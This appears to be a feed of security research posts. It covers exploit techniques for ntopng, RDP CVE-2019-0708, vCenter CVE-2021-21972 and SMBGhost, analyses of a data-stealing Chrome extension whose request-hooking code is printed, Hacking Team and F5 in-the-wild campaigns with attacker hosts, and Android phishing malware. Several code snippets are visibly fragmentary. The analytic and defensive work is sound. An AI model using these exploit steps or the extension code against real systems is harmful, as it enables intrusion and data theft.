    if( string.len(text) >= 4096 ) then 
      text = string.sub( text, 1, 4096 )

    if (bot_token and chat_id) and (bot_token ~= "") and (chat_id ~= "") then 
      os.execute("curl -X POST"..bot_token..
      "/sendMessage -d chat_id="..chat_id.." -d text=\" " ..text.." \" ")
      return 0

      return 1

0x06. 利用主机发现功能实现 RCE (版本 3.2-3.8)

原理同 0x04,利用点在 modules/alert_utils.lua 中,需要在 Redis 里设置合适的 threshold。

local function entity_threshold_crossed(granularity, old_table, new_table, threshold)
   local rc
   local threshold_info = table.clone(threshold)

   if old_table and new_table then -- meaningful checks require both new and old tables
      -- This is where magic happens: load() evaluates the string
      local what = "val = "..threshold.metric.."(old, new, duration); if(val ".. op .. " " ..
       threshold.edge .. ") then return(true) else return(false) end"

      local f = load(what)

0x07. 在云主机上进行利用

SSDP 通常是在局域网内进行数据传输的,看似不可能针对公网的 ntopng 进行攻击。但是我们根据 0x04 中所提及到的 SSDP 的运作方式可知,当 ntopng 发送 M-SEARCH 请求后,在 3s 内向其隐式绑定的 UDP 端口发送数据即可使 ntopng 成功触发漏洞。

// modules/discover_utils.lua: local ssdp = interface.discoverHosts(3) <- timeout
if(timeout < 1) timeout = 1;

tv.tv_sec = timeout;
tv.tv_usec = 0;

while(select(udp_sock + 1, &fdset, NULL, NULL, &tv) > 0) {
    struct sockaddr_in from = { 0 };
    socklen_t s = sizeof(from);
    char ipbuf[32];
    int len = recvfrom(udp_sock, (char*)msg, sizeof(msg), 0, (sockaddr*)&from, &s);

针对云主机,如 Google Compute Engine、腾讯云等,其实例的公网 IP 实际上是利用 NAT 来进行与外部网络的通信的。即使绑定在云主机的内网 IP 地址上(如 10.x.x.x),在流量经过 NAT 时,dst IP 也会被替换为云主机实例的内网 IP 地址,也就是说,我们一旦知道其与 SSDP 多播地址 通信的 UDP 端口,即使不在同一个局域网内,也可以使之接收到我们的 payload,以触发漏洞。

针对 0x04,我们可以利用 rest/v1/get/flow/active.lua 来获取当前 ntopng 服务器与 通信的端口,由于这个路径长度为奇数,所以我们需要利用 0x02 中提及到的任意 lua 文件包含来进行利用。

同时,由于 UDP 通信的过程中此端口是隐式绑定的,且并没有进行来源验证,所以一旦获取到这个端口号,则可以向此端口发送 SSDP 数据包,以混淆真实的 SSDP 回复。需要注意的是,需要在触发主机功能的窗口期内向此端口发送数据,所以整个攻击流程如下:

  1. 触发主机发现功能;
  2. 循环请求 rest/v1/get/flow/active.lua 以获取端口;
  3. 再次触发主机发现功能;
  4. 向目标从第 2 步获取到的 UDP 端口发送 payload;
  5. 尝试利用 Cookie 进行登录以绕过认证。

针对 0x05,我们可以利用 get_flows_data.lua 来获取相关的 UDP 端口,原理不再赘述。

0x07. Conclusion


CVE-2019-0708 漏洞在 Windows Server 2008 R2 上的利用分析

By: yyjb
27 February 2021 at 07:06


cve-2019-0708是2019年一个rdp协议漏洞,虽然此漏洞只存在于较低版本的windows系统上,但仍有一部分用户使用较早版本的系统部署服务器(如Win Server 2008等),该漏洞仍有较大隐患。在此漏洞发布补丁之后不久,msf上即出现公开的可利用代码;但msf的利用代码似乎只针对win7,如果想要在Win Server 2008 R2上利用成功的话,则需要事先在目标机上手动设置注册表项。

在我们实际的渗透测试过程中,发现有部分Win Server 2008服务器只更新了永恒之蓝补丁,而没有修复cve-2019-0708。因此,我们尝试是否可以在修补过永恒之蓝的Win Server 2008 R2上实现一个更具有可行性的cve-2019-0708 EXP。



我们分析了msf的exp代码,发现公开的exp主要是利用大量Client Name内核对象布局内核池。这主要有两个目的,一是覆盖漏洞触发导致MS_T120Channel对象释放后的内存,构造伪造的Channel对象;二是直接将最终的的shellcode布局到内核池。然后通过触发IcaChannelInputInternal中Channel对象在其0x100偏移处的虚函数指针引用来达到代码执行的目的。如图1:


而这种利用方式并不适用于server2008r2。我们分析了server2008r2的崩溃情况,发现引起崩溃的原因是第一步,即无法使用Client Name对象伪造channel对象,从而布局失败。这是因为在默认设置下,server 2008 r2的
RDPSND/MS_T120 channel对象不能接收客户端Client Name对象的分片数据。根据MSF的说明(见图2),只有发送至RDPSND/MS_T120的分片信息才会被正确处理;win7以上的系统不支持MS_T120,而RDPSND在server 2008 r2上并不是默认开启的因此,我们需要寻找其他可以伪造channel对象的方式。

图2 MSF利用代码中针对EXP的说明

在此期间,我们阅读了几篇详细分析cve-2019-0708的文章(见参考链接),结合之前的调试分析经历,我们发现的确可以利用RDPDR 的channelID(去掉MSF中对rdp_on_core_client_id_confirm函数的target_channel_id加一的操作即可)使Client Name成功填充MS_T120 channel对象,但使用RDPDR 有一个缺陷:RDPDR Client Name对象只能申请有限的次数,基本上只能完成MS_T120对象的伪造占用并触发虚函数任意指针执行,无法完成后续的任意地址shellcode布局。


我们再次研究了Unit 42发布的报告,他们利用之前发布的文章中提到的Refresh Rect PDU对象来完成内核池的大范围布局(如图,注:需要在RDP Connection Sequence之后才能发送这个结构)。虽然这种内存布局方式每次只能控制8个字节,但作者利用了一个十分巧妙的方式,最终在32位系统上完成漏洞利用。



而文章作者就是利用了在32位系统上地址长度只有4字节的特性,以及一条极短的汇编语句add bl,al; jmp ebx,这两个功能的代码合起来刚好在8字节的代码中完成。之后通过伪造channel对象里面的第二阶段跳转代码再次跳转到最后的shellcode上。(具体参考Unite 42的报告

我们尝试在64位系统上复现这种方法。通过阅读微软对Refresh Rect PDU描述的官方文档以及msf的rdp.rb文件中对rdp协议的详细注释,我们了解到,申请Refresh Rect PDU对象的次数很多,能够满足内核池布局大小的需求,但在之后多次调试分析后发现,这种方法在64位系统上的实现有一些问题:在64位系统上,仅地址长度就达到了8字节。我们曾经考虑了一种更极端的方式,将内核地址低位上的可变的几位复用为跳转语句的一部分,但由于内核池地址本身的大小范围,这里最多控制低位上的7位,即:

0xfffffa801“8c08000“ 7位可控

另外,RDPDR Client Name对象的布局的可控数据位置本身也是固定的(即其中最低的两位也是固定的),这样我们就只有更少的5位来实现第二阶段的shellcode跳转,即:

“8c080”0xfffffa801“8c080”00 5位可控,



无论是永恒之蓝还是之后的SMBGhost都使用到srvnet对象进行内存布局。最容易的方法可以借助于msf中ms17-010的代码,通过修改代码中对make_smb2_payload_headers_packetmake_smb2_payload_body_packet 大小和数据的控制,能够比较容易地获取一种稳定的内核池布局方式(相关代码参考图5)。


由于单个Client Name Request所申请的大小不足以存放一个完整的shellcode,并且如上面提到的,也不能申请到足够多的RDPDR Client Name来布局内核池空间,所以我们选择将最终的shellcode直接布局到srvnet申请的内核池结构中,而不是将其当作一个跳板,这样也简化了整个漏洞的利用过程。

最后需要说明一下shellcode的调试。ms17-010中的shellcode以及0708中的shellcode都有一部分是根据实际需求定制的,不能直接使用。0708中的shellcode受限于RDPDR Client Name大小的限制,需要把shellcode的内核模块和用户层模块分为两个部分,每部分shellcode头部还带有自动搜索另一部分shellcode的代码。为了方便起见,我们直接使用ms17-010中的shellcode,其中只需要修改一处用来保存进程信息对象结构的固定偏移地址。之后,我们仍需要在shellcode中添加文章中安全跳过IcaChannelInputInternal函数剩余部分可能崩溃的代码(参考Patch Kernel to Avoid Crash 章节),即可使整个利用正常工作。64位中添加的修补代码如下:

mov qword ptr[rbx+108h],0
mov rax,qword ptr[rsp]
add rax,440h
mov qword ptr[rsp],rax
mov r11,qword ptr gs:[188h]
add word ptr [r11+1C4h],1





CVE-2021-21972 vCenter Server 文件写入漏洞分析

By: RicterZ
24 February 2021 at 08:59

0x01. 漏洞简介

vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。

vSphere Client(HTML5)在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求,从而在服务器上写入 webshell,最终造成远程任意代码执行。

0x02. 影响范围

  • vmware:vcenter_server 7.0 U1c 之前的 7.0 版本
  • vmware:vcenter_server 6.7 U3l 之前的 6.7 版本
  • vmware:vcenter_server 6.5 U3n 之前的 6.5 版本

0x03. 漏洞影响

VMware已评估此问题的严重程度为 严重 程度,CVSSv3 得分为 9.8

0x04. 漏洞分析

vCenter Server 的 vROPS 插件的 API 未经过鉴权,存在一些敏感接口。其中 uploadova 接口存在一个上传 OVA 文件的功能:

        value = {"/uploadova"},
        method = {RequestMethod.POST}
    public void uploadOvaFile(@RequestParam(value = "uploadFile",required = true) CommonsMultipartFile uploadFile, HttpServletResponse response) throws Exception {"Entering uploadOvaFile api");
        int code = uploadFile.isEmpty() ? 400 : 200;
        PrintWriter wr = null;
        String returnStatus = "SUCCESS";
        if (!uploadFile.isEmpty()) {
            try {
      "Downloading OVA file has been started");
      "Size of the file received  : " + uploadFile.getSize());
                InputStream inputStream = uploadFile.getInputStream();
                File dir = new File("/tmp/unicorn_ova_dir");
                if (!dir.exists()) {
                } else {
                    String[] entries = dir.list();
                    String[] var9 = entries;
                    int var10 = entries.length;

                    for(int var11 = 0; var11 < var10; ++var11) {
                        String entry = var9[var11];
                        File currentFile = new File(dir.getPath(), entry);

          "Successfully cleaned : /tmp/unicorn_ova_dir");

                TarArchiveInputStream in = new TarArchiveInputStream(inputStream);
                TarArchiveEntry entry = in.getNextTarEntry();
                ArrayList result = new ArrayList();

代码逻辑是将 TAR 文件解压后上传到 /tmp/unicorn_ova_dir 目录。注意到如下代码:

                while(entry != null) {
                    if (entry.isDirectory()) {
                        entry = in.getNextTarEntry();
                    } else {
                        File curfile = new File("/tmp/unicorn_ova_dir", entry.getName());
                        File parent = curfile.getParentFile();
                        if (!parent.exists()) {

直接将 TAR 的文件名与 /tmp/unicorn_ova_dir 拼接并写入文件。如果文件名内存在 ../ 即可实现目录遍历。

对于 Linux 版本,可以创建一个包含 ../../home/vsphere-ui/.ssh/authorized_keys 的 TAR 文件并上传后利用 SSH 登陆:

$ ssh -lvsphere-ui

VMware vCenter Server

Type: vCenter Server with an embedded Platform Services Controller

vsphere-ui@bogon [ ~ ]$ id
uid=1016(vsphere-ui) gid=100(users) groups=100(users),59001(cis)

针对 Windows 版本,可以在目标服务器上写入 JSP webshell 文件,由于服务是 System 权限,所以可以任意文件写。

0x05. 漏洞修复


  • vCenter Server 7.0 版本升级到 7.0.U1c

  • vCenter Server 6.7版本升级到 6.7.U3l

  • vCenter Server 6.5版本升级到 6.5 U3n



  1. SSH远连到vCSA(或远程桌面连接到Windows VC)

  2. 备份以下文件:

    • Linux系统文件路径为:/etc/vmware/vsphere-ui/compatibility-matrix.xml (vCSA)

    • Windows文件路径为:C:\ProgramData\VMware\vCenterServer\cfg\vsphere-ui (Windows VC)

  3. 使用文本编辑器将文件内容修改为: 640

  4. 使用vmon-cli -r vsphere-ui命令重启vsphere-ui服务

  5. 访问https:///ui/vropspluginui/rest/services/checkmobregister,显示404错误 640--1--1

  6. 在vSphere Client的Solutions->Client Plugins中VMWare vROPS插件显示为incompatible 640--2-

0x06. 参考链接

隐藏在 Chrome 中的窃密者

By: gaoya
23 October 2020 at 09:43


近日,有reddit用户反映,拥有100k+安装的Google Chrome扩展程序 User-Agent Switcher存在恶意点赞facebook/instagram照片的行为。

除User-Agent Switcher以外,还有另外两个扩展程序也被标记为恶意的,并从Chrome商店中下架。


  • User-Agent Switcher
  • Nano Defender
  • Nano Adblocker
    • 疑为

目前,Google已将相关扩展程序从 Web Store 中删除。Firefox插件则不受影响。


Chrome Webstore显示的各扩展程序的安装量如下:

  • User-Agent Switcher: 100 000+
  • Nano Defender: 200 000+
  • Nano Adblocker: 100 000+


国外社区用户研究者报告了User-Agent Switcher随机点赞facebook/Instagram照片的行为,虽然我们目前还没有看到有窃取密码或远程登录的行为,但是考虑到这些插件能够收集浏览器请求头(其中也包括cookies),我们可以合理推测,攻击者是能够利用收集到的信息进行未授权登录的。为了防止更进一步危害的发生,我们在此建议受影响的Chrome用户:

  • 及时移除插件
  • 检查 Facebook/Instagram 账户是否存在来历不明的点赞行为
  • 检查账户是否存在异常登录情况
  • 修改相关账户密码
  • 登出所有浏览器会话


  • 8月29日,User-Agent Switcher 更新 版本
  • 9月7日,User-Agent Switcher 更新 版本
  • 10月3日,Nano Defender作者jspenguin2017宣布将 Nano Defender 转交给其他开发者维护
  • 10月7日,reddit用户 ufo56 发布帖子,报告 User-Agent Switcher 的恶意行为
  • 10月15日,Nano Defender 更新 版本,同时:
    • 有开发者报告新开发者在商店中更新的 版本与repository中的代码不符(多了background/connection.js
    • uBlock开发者gorhill对新增代码进行了分析


User-Agent Switcher



User-Agent Switcher与2.0.0.9版本的文件结构完全相同,攻击者仅修改了其中两个文件:js/background.min.jsjs/JsonValues.min.js



js/background.min.js 中定义了扩展程序的后台操作。



// 完整代码
// 发起到 C2 的连接
var userAgent = io("");
async function createFetch(e) {
    let t = await fetch(e.uri, e.attr),
        s = {};
    return s.headerEntries = Array.from(t.headers.entries()), 
  = await t.text(), 
           s.ok = t.ok, 
           s.status = t.status, 
// 监听“createFetch”事件
userAgent.on("createFetch", async function (e) {
    let t = await createFetch(e);
    userAgent.emit(e.callBack, t)
handlerAgent = function (e) {
    return -1 == e.url.indexOf("useragentswitch") && userAgent.emit("requestHeadersHandler", e), {
        requestHeaders: JSON.parse(JSON.stringify(e.requestHeaders.reverse()).split("-zzz").join(""))
// hook浏览器请求
chrome.webRequest.onBeforeSendHeaders.addListener(handlerAgent, {
    urls: ["<all_urls>"]
}, ["requestHeaders", "blocking", "extraHeaders"]);

攻击者添加的代码中定义了一个到 的连接,并hook了浏览器的所有网络请求。当url中未包含 useragentswitch 时,将请求头编码后发送到C2。除此之外,当js代码接收到“createFetch”事件时,会调用 createFetch 函数,从参数中获取uri等发起相应请求。



在处理hook的请求头时,js代码会替换掉请求头中的 -zzz 后再发送,但我们暂时无法得知这样操作的目的是什么。

User-Agent Switcher 和 版本几乎相同,仅修改了 js/background.min.js 文件中的部分代码顺序,在此不做多述。


js/JsonValues.min.js 中原本为存储各UserAgent的文件。攻击者在文件后附加了大量js代码。经过分析,这些代码为混淆后的socketio客户端


Nano Defender


在Nano Defender中,攻击者同样修改了两个文件:


其中,background/connection.js 为新增的文件,与User-Agent Switcher中的 js/JsonValues.min.js 相同,为混淆后的socketio客户端。


background/core.js 与User-Agent Switcher中的 js/background.min.js 相似,同样hook浏览器的所有请求并发送至C2(,并监听dLisfOfObject事件,发起相应请求。

background/core.js 部分修改代码

与User-Agent Switcher不同的是,在将浏览器请求转发至C2时,会使用正则过滤。过滤原则为C2返回的listOfObject,如果请求头满足全部条件,则转发完整的请求头,否则不予转发。



var m = [45,122,122,122]
var s = x => String.fromCharCode(x) )
var x = s.join("");
var replacerConcat = stringyFy.split(x).join(""); 
var replacer = JSON.parse(replacerConcat); 
return { 
    requestHeaders: replacer 


Nano Adblocker


尽管有报告提到,Nano Adblocker 版本也被植入了恶意代码,但是我们并没有找到此版本的扩展程序文件以及相关资料。尽管该扩展程序已被下架,我们仍旧无法确认Google商店中的插件版本是否为受影响的版本。第三方网站显示的版本历史中的最后一次更新为2020年8月26日,版本号为1.0.0.153。

Nano Adblocker 更新历史


由于各插件已被Google下架,我们无法从官方商店获取插件详情。根据第三方网站,User-Agent Switcher 版本历史如下:


第三方网站显示的 Nano Defender 版本历史显示,攻击者在2020年10月15日在Google Web Store上更新了15.0.0.206版本,而C2域名dev-nano.com注册时间为2020年10月11日。


我们对比了User-Agent Switcher和Nano Defender的代码。其中,js/background.js (from ua switcher)和background/core.js (from nano defender) 两个文件中存在相同的代码。

左图为ua switcher新增的部分代码,右图为nano defender新增的部分代码


左图为ua switcher,右图为nano defender


Nano Defender新开发者创建了自己的项目。目前该项目以及账户(nenodevs)均已被删除,因此我们无法从GitHub主页获取到有关他们的信息。

攻击者使用的两个域名都是在插件上架前几天注册的,开启了隐私保护,并利用CDN隐藏真实IP,而他们在扩展程序中使用的C2地址 目前均指向了namecheap的parkingpage。


Nano Defender原作者称新开发者是来自土耳其的开发团队,但是我们没有找到更多的信息证实攻击者的身份。



窃取用户隐私的浏览器插件并不罕见。早在2017年,在v2ex论坛就有用户表示,Chrome中另一个名为 User-Agent Switcher 的扩展程序可能存在未授权侵犯用户隐私的恶意行为;2018年卡巴斯基也发布了一篇关于Chrome恶意插件的报告。由于Google的审核流程并未检测到此类恶意插件,攻击者仍然可以通过类似的手法进行恶意活动。


f45d19086281a54b6e0d539f02225e1c -> user-agent switcher
6713b49aa14d85b678dbd85e18439dd3 -> user-agent switcher
af7c24be8730a98fe72e56d2f5ae19db -> nano defender


凛冬将至,恶魔重新降临 —— 浅析 Hacking Team 新活动

By: liuchuang
29 September 2020 at 10:49


Hacking Team 是为数不多在全球范围内出售网络武器的公司之一,从 2003 年成立以来便因向政府机构出售监视工具而臭名昭著。

2015年7月,Hacking Team 遭受黑客攻击,其 400GB 的内部数据,包括曾经保密的客户列表,内部邮件以及工程化的漏洞和后门代码被全部公开。随后,有关 hacking team 的活动突然销声匿迹。

2018年3月 ESET 的报告指出:Hacking Team 一直处于活跃状态,其后门版本也一直保持着稳定的更新。

2018年12月360高级威胁应对团队的报告披露了 Hacking Team 使用 Flash 0day 的”毒针”行动。

2019年11月360高级威胁应对团队的报告披露了 APT-C-34 组织使用 Hacking Team 网络武器进行攻击。

2020年4月360诺亚实验室的报告披露出 Hacking Team 新的攻击活动。

以上信息表明,Hacking Team 依旧处于活跃状态,并且仍然保持着高水准的网络武器开发能力。


2020年9月11日,VirusTotal 上传了一份来自白俄罗斯的 rtf 恶意文档样本,该样本疑似 CVE-2020-0968 漏洞首次被发现在野利用。国内友商将此攻击事件称为“多米诺行动”,但并未对其进行更丰富的归因。

我们分析相关样本后发现,该行动中使用的后门程序为 Hacking Team scout 后门的 38 版本。

此版本的后门使用了打印机图标,伪装成 Microsoft Windows Fax and Scan 程序。


此样本的后门 ID 为031b000000015

C2 为 185.243.112[.]57

和之前的版本相同,scout 使用 post 方式,将加密信息上传至 185.243.112[.]57/search,且使用了相同的 UserAgent。由于其版本间的功能变化不大,我们在此不再对其进行详细分析。若对 scout 后门技术细节感兴趣,可以参考我们之前发布的报告



关联到的样本名为: дело1502-20памятка_эл72129.rtf,中文翻译为:案例 1502-20 备忘录。rtf运行后,会从远程服务器 23.106.122[.]190 下载 文件,并释放后门程序到 %UserProfile%\AppData\Local\Comms\mswfs.exe。9月26日分析时,从服务器下载的 文件为正常的 winrar 安装包文件。

mswfs.exe 同样为 scout 后门38版本。

与针对白俄罗斯的攻击中的样本相同,该样本伪装成 Microsoft Windows Fax and Scan 程序,并使用了相同的数字签名。

此样本后门 ID 和 C2 如下图所示。

C2: 87.120.37[.]47

通过对远程服务器 23.106.122[.]190 进行分析,我们发现该 ip 关联的域名为 gvpgov[.]ru,注册日期为2020年9月11号。该域名为 的伪装域名,直接访问 23.106.122[.]190 会跳转到 ,即俄罗斯军事检察官办公室门户。


结合白俄罗斯上传的 “СВЕДЕНИЯ О ПОДСУДИМОМ.rtf” (中文翻译为“有关被告的信息”)样本和关联到的新样本,我们可以推测,此次行动是攻击者使用 Hacking Team 网络武器库针对俄罗斯与白俄罗斯军事/司法部门相关人员的一次定向攻击事件。



2019年4月,Hacking Team 这家意大利公司被另一家网络安全公司收购并更名为 Memento Labs。一年多之后的2020年5月,Hacking Team 的创始人和前首席执行官 David Vincenzetti 在其官方 LinkedIn 账号上发布了一条简短的消息:

Hacking Team is dead.

Hacking Team 的几名主要员工离职后,尽管新产品的开发速度有所减缓,但通过观测到的 scout 后门版本的更新情况,我们发现 Hacking Team 仍然保持着较高频率的活跃,这也说明 Memento Labs 一直在努力试图崛起。

观测到的时间 scout版本号 签名 签名有效期 伪装的程序
2019-10 35 KELSUREIWT LTD 2018.10-2019.10 ActiveSync RAPI Manager
2020-01 35 CODEMAT LTD 2019.06-2020.06 ActiveSync RAPI Manager
2020-05 36 Pribyl Handels GmbH 2019.12-2020.12 ActiveSync RAPI Manager
2020-09 38 Sizg Solutions GmbH 2019.12-2020.12 Microsoft Windows Fax and Scan




9E570B21929325284CF41C8FCAE4B712 mswfs.exe







60981545a5007e5c28c8275d5f51d8f0 СВЕДЕНИЯ О ПОДСУДИМОМ.rtf
ba1fa3cc9c79b550c2e09e8a6830e318 dll
f927659fc6f97b3f6be2648aed4064e1 exe






By: gaoya
14 July 2020 at 09:51



  • 我们分析了exp导致系统蓝屏的原因,并尝试对其进行了改进;
  • 相对于重构前exp,重构后的exp执行效率与稳定性都有显著提高;
  • 关于漏洞原理阐述,Ricerca Security在2020年4月份发布的一篇blog中已非常清晰,有兴趣的读者可以移步阅读,本文不再赘述。




  1. 漏洞利用到内核shellcode代码开始执行
  2. 内核shellcode代码执行
  3. 用户层shellcode执行


  • ZecOps


  • chompie1337




我们在win10 1903中测试了chompie1337的exp代码,绝大部分的崩溃原因是在漏洞利用成功后、内核shellcode代码执行(即exp执行的第二阶段)时,申请用户空间内存的API zwAllocateVirtualMemory调用失败。在我们的多次测试中,崩溃现场主要包括以下两种:

Crash_A backtrace
Crash_B backtrace


在遇到crash_B时,我们起初认为这是在内核态申请用户态读写权限内存时,系统复制CFG Bitmap出现的异常。CFG(Control Flow Guard,控制流防护)会检查内存申请等关键API调用者是否有效,以避免出现安全问题。

随后,我们尝试了一些CFG绕过的方法,包括替换内存申请API间接调用地址,强制修改进程CFG启动标志等,这些方法无一例外都失败了。但在尝试过程中,ZecOps在他的漏洞分析利用文章中提到的一篇文章给了我们启发。zerosum0x0这篇文章分析了cve-2019-0708漏洞内核shellcode不能稳定利用的原因,其中提到了微软针对Intel CPU漏洞的缓解措施,KVA Shadow。


我们根据KVA Shadow缓解措施原理,猜测这是本次测试exp崩溃的根本原因。内核shellcode在调用API申请用户层内存时,由于KVA Shadow对于用户层和内核层的系统服务调用陷阱,如果IRQL等级不是PASSIVE_LEVEL,无法获取到正确的用户层映射地址。


通过参考zerosum0x0文章中修正CVE-2019-0708 payload来绕过KVA Shadow的代码,但出于时间以及系统稳定性等多方面因素,我们暂时放弃了这种方法,转而尝试通过一种更简单和容易的方式来解决这个问题。





我们在内核shellcode调用zwAllocateVirtualMemory API之前修改CFG标志,就可以避免大部分崩溃情况(即B类型),顺利完成用户态内存的分配。需要一提的是,win10在内存申请时,大部分系统处理过程都是针对CFG的相关处理,导致B类型崩溃产生的次数在实际测试中占比达80%以上,所以我们没有考虑A类型崩溃的情况。

参考Google Researcher Bruce Dawson有关windows创建进程性能分析的文章 <O(n^2) in CreateProcess>



这里我们采用了zerosum0x0文章中的方式:在内核shellcode中,patch CFG检查函数(ldrpvalidateusercalltarget和ldrpdispatchusercalltarget),跳过CFG检查过程来达到目的。需要注意的是,在内核态修改用户态代码前,要修改cr0寄存器来关闭代码读写保护。

另外,在patch CFG检查函数时,使用相对偏移查找相应的函数地址。由于CVE-2020-0796只影响win10 1903和1909版本,因此这种方法是可行的。但如果是其他更通用的漏洞,还需要考虑一种更加合理的方式来寻找函数地址。


我们在win10 1903(专业版/企业版)和win10 1909(专业版/企业版)中测试了代码。经过测试,修改后的exp代码执行成功率从不到20%上升到了80%以上。但我们的修改仍然是不完美的:

  1. 本文并没有解决漏洞利用阶段可能出现的问题。尽管chompie1337的漏洞利用阶段代码已经非常完善,但仍不是100%成功。考虑到漏洞利用阶段出现崩溃的概率非常低(在我们的实际测试中,出现概率低于10%),如果系统处于流畅运行,这种概率会更小,我们的exp仍然使用了chompie1337在漏洞利用阶段的代码。
  2. 在本文中,我们尝试解决了由CFG处理机制导致的崩溃情形(即类型B的情况),没有从根本上解决内核shellcode执行阶段的崩溃。在这个阶段,shellcode仍然可能导致系统崩溃出现蓝屏,但这种概率比较低,在我们的测试中没有超过20%。
  3. 在使用本文的方式成功执行用户态shellcode之后,系统处于一种不稳定状态。如果系统中有其他重要进程频繁进行API调用,系统大概率会崩溃;如果仅通过反弹的后台shell执行命令,系统会处在一种相对稳定的状态。我们认为,对渗透测试来说,改进后的exp已经基本能够满足需求。




针对网络公开的CVE-2020-0796 exp在实际使用过程中会产生崩溃的问题,本文分享了一些方法来解决这些问题,以便满足实际在渗透测试等应用场景中的需求。尽管本文的方法不尽完美,但我们希望我们的研究工作能够为诸位安全同僚提供一些思路。我们也会在后续的工作当中,持续对此进行研究,力图找到一种更简单、通用的方式解决问题。

F5 RCE(CVE-2020-5902)在野攻击事件调查

By: gaoya
13 July 2020 at 09:26

F5 Networks官方在7月1日公布了BIG-IP系统的TMUI接口中存在一个严重的远程代码执行漏洞(CVE-2020-5902)。利用此漏洞的攻击层出不穷,我们对这些事件进行了总结,以期对近日来的事件进行完整阐述。








  • 2020-7-1:F5 Networks官方发布通告,缓解措施为在配置文件中添加以下内容:
<LocationMatch ".*\.\.;.*">
Redirect 404 /
<LocationMatch ";">
Redirect 404 /
  • 7.10日, F5官方再次更新通告,配置更新为:
<LocationMatch ";">
Redirect 404 /
<LocationMatch "hsqldb">
Redirect 404 /


根据NCC groups发布的报告,7月4日就有攻击者尝试使用该漏洞进行攻击,但攻击者数量较少;360安全大脑专家云的事件调查专家也在国内观测到,在exp公布前几个小时,已经存在利用twitter上公布的poc进行扫描的流量;完整功能的exp公布后,扫描流量也随即改变。

从exp公开发布起的5天内,360就已在国内捕获到超过2万次CVE-2020-5902的扫描请求,其中绝大部分为通过推特或其他渠道公开获取的PoC或exp以及metasploit exp。可以看出,该漏洞已经引发了大量关注。截止目前我们尚未观测到国内有相关资产已经遭受攻击






  • Payload地址:http://217.12[.]199[.]179/





  • Payload地址:http://45.77.28[.]70[:]80/



(图片来自NCC group)




.tmp脚本是一个downloader,用来从目标地址下载demo.txt到/tmp/dvrHelper并执行。dvrHelper是开源的botnet Mirai修改的一个变种。

  • Payload地址:http://103.224.82[.]85[:]8000/zabbix



(图片来自NCC Group)



利用cve-2020-5902,通过命令或脚本下发php webshell

除了下发脚本执行以外,有的攻击者选择上传webshell以便获取持续的权限。(详见 RIFT: F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902 Intelligence

cve-2020-5902结合hsqldb Java反序列化漏洞执行命令

2020年7月7日,有研究人员发现hsqldb 中存在java反序列化漏洞,并结合该漏洞实现了一种新的利用方式。在此利用方式发现后的短时间内,有攻击者利用此方式发起了攻击,并且利用相似的方式绕过了F5 Networks官方通告中的缓解措施;而6小时后,才有研究人员公开宣布,缓解措施可被绕过。由此可见,在利用CVE-2020-5902进行攻击的人员中,不乏较高能力的攻击者。





另外,攻击者在释放新的payload时,使用了与创建webshell相同的手段,即”echo [base64 encoded content] | base64 –d > [file]”。因此,结合之前清除的文件名信息,如果该脚本确实来自攻击者,那么可以认为,这些不同的payload是由同一个攻击者在不同时间植入目标系统的。








尽管F5 Networks在其通告中给出了临时缓解措施并且在不断更新,我们仍然建议将系统版本升级至不受影响的版本(如15.1.0.4),以避免由于新的绕过技术出现导致现有的缓解措施失效,给网络系统带来不必要的损失。














Phishing Android Malware Targets Taxpayers in India

3 September 2021 at 18:33

Authored by ChanUng Pak  

McAfee’s Mobile Research team recently found a new Android malware, Elibomi, targeting taxpayers in India. The malware steals sensitive financial and private information via phishing by pretending to be a tax-filing application. We have identified two main campaigns that used different fake app themes to lure in taxpayers. The first campaign from November 2020 pretended to be a fake IT certificate application while the second campaign, first seen in May 2021, used the fake tax-filing theme. With this discovery, the McAfee Mobile Research team has been able to update McAfee Mobile Security so that it detects this threat as Android/Elibomi and alerts mobile users if this malware is present in their devices. 

During our investigation, we found that in the latest campaign the malware is delivered using an SMS text phishing attack. The SMS message pretends to be from the Income Tax Department in India and uses the name of the targeted user to make the SMS phishing attack more credible and increase the chances of infecting the device. The fake app used in this campaign is designed to capture and steal the victim’s sensitive personal and financial information by tricking the user into believing that it is a legitimate tax-filing app. 

We also found that Elibomi exposes the stolen sensitive information to anyone on the Internet. The stolen data includes e-mail addresses, phone numbers, SMS/MMS messages among other financial and personal identifiable information. McAfee has reported the servers exposing the data and at the time of publication of this blog the exposed information is no longer available. 

Pretending to be an app from the Income Tax Department in India 

The latest and most recent Elibomi campaign uses a fake tax-filing app theme and pretends to be from the Income Tax Department from the Indian government. They even use the original logo to trick the users into installing the app. The package names (unique app identifiers) of these fake apps consist of a random word + another random string + imobile (e.g. “direct.uujgiq.imobile” and “olayan.aznohomqlq.imobile”). As mentioned before this campaign has been active since at least May 2021. 

Figure 1. Fake iMobile app pretending to be from the Income Tax Department and asking SMS permissions 

After all the required permissions are granted, Elibomi attempts to collect personal information like e-mail address, phone number and SMS/MMS messages stored in the infected device: 

Figure 2. Elibomi stealing SMS messages 

Prevention and defense 

Here are our recommendations to avoid being affected by this and other Android threats that use social engineering to convince users to install malware disguised as legitimate apps: 

  • Have a reliable and updated security application like McAfee Mobile Security installed in your mobile devices to protect you against this and other malicious applications. 
  • Do not click on suspicious links received from text messages or social media, particularly from unknown sources. Always double check by other means if a contact that sends a link without context was really sent by that person because it could lead to the download of a malicious application. 


Android/Elibomi is just another example of the effectiveness of personalized phishing attacks to trick users into installing a malicious application even when Android itself prevents that from happening. By pretending to be an “Income Tax” app from the Indian government, Android/Elibomi has been able to gather very sensitive and private personal and financial information from affected users which could be used to perform identify and/or financial fraud. Even more worryingly, the information was not only in cybercriminals’ hands, but it was also unexpectedly exposed on the Internet which could have a greater impact on the victims. As long as social engineering attacks remain effective, we expect that cybercriminals will continue to evolve their campaigns to trick even more users with different fake apps including ones related to financial and tax services. 

McAfee Mobile Security detects this threat as Android/Elibomi and alerts mobile users if it is present. For more information about McAfee Mobile Security, visit 

For those interested in a deeper dive into our research… 

Distribution method and stolen data exposed on the Internet 

